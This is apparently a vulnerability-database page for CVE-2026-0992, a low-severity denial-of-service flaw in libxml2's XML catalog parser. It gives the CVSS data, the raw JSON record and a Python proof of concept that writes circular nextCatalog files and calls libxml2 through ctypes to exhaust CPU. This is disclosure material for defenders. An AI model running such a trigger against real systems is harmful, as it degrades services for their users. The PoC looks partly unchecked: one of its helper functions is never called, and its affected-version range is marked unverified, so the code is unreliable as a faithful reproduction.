Security Vulnerability Report
中文
CVE-2026-0992 CVSS 2.9 LOW

CVE-2026-0992

Published: 2026-01-15 15:15:53
Last Modified: 2026-04-22 10:16:50
Source: [email protected]

Description

A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.

CVSS Details

CVSS Score
2.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

libxml2 < 2.13.0 (待验证)
libxml2所有支持XML Catalog功能的版本均可能受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-0992 PoC: libxml2 XML Catalog Infinite Loop This PoC demonstrates how circular <nextCatalog> references can cause uncontrolled resource consumption in libxml2's catalog parser. """ import os import tempfile import time from ctypes import CDLL, c_char_p, POINTER, c_int def create_circular_catalogs(): """Create circular referencing XML catalogs""" catalog1 = '''<?xml version="1.0"?> <catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog"> <nextCatalog catalog="catalog2.xml"/> </catalog>''' catalog2 = '''<?xml version="1.0"?> <catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog"> <nextCatalog catalog="catalog1.xml"/> </catalog>''' return catalog1, catalog2 def create_repeated_nextCatalog(): """Create catalog with repeated nextCatalog pointing to same file""" catalog = '''<?xml version="1.0"?> <catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog"> <nextCatalog catalog="target.xml"/> <nextCatalog catalog="target.xml"/> <nextCatalog catalog="target.xml"/> <nextCatalog catalog="target.xml"/> <nextCatalog catalog="target.xml"/> <!-- Repeat thousands of times --> </catalog>''' return catalog def trigger_vulnerability(): """Trigger libxml2 catalog parsing vulnerability""" with tempfile.TemporaryDirectory() as tmpdir: # Create circular catalogs catalog1, catalog2 = create_circular_catalogs() with open(os.path.join(tmpdir, 'catalog1.xml'), 'w') as f: f.write(catalog1) with open(os.path.join(tmpdir, 'catalog2.xml'), 'w') as f: f.write(catalog2) # Set catalog environment variable catalog_path = os.path.join(tmpdir, 'catalog1.xml') os.environ['XML_CATALOG_FILES'] = catalog_path # Attempt to parse - will trigger infinite loop try: libxml2 = CDLL('libxml2.so.2') xmlParseCatalog = libxml2.xmlParseCatalog xmlParseCatalog.restype = c_int xmlParseCatalog.argtypes = [c_char_p] # This call will cause excessive CPU consumption result = xmlParseCatalog(catalog_path.encode('utf-8')) print(f'Catalog parsing returned: {result}') except Exception as e: print(f'Error: {e}') print('Note: Requires libxml2 development libraries') if __name__ == '__main__': print('CVE-2026-0992 PoC - libxml2 Catalog DoS') print('WARNING: This may cause high CPU usage!') trigger_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0992", "sourceIdentifier": "[email protected]", "published": "2026-01-15T15:15:52.657", "lastModified": "2026-04-22T10:16:50.273", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition."}, {"lang": "es", "value": "Se encontró una falla en la biblioteca libxml2. Esta vulnerabilidad de consumo de recursos no controlado ocurre al procesar catálogos XML que contienen elementos repetidos que apuntan al mismo catálogo descendente. Un atacante remoto puede explotar esto al proporcionar catálogos manipulados, lo que hace que el analizador recorra redundantemente las cadenas de catálogos. Esto conduce a un consumo excesivo de CPU y degrada la disponibilidad de la aplicación, lo que resulta en una condición de denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:7519", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0992", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.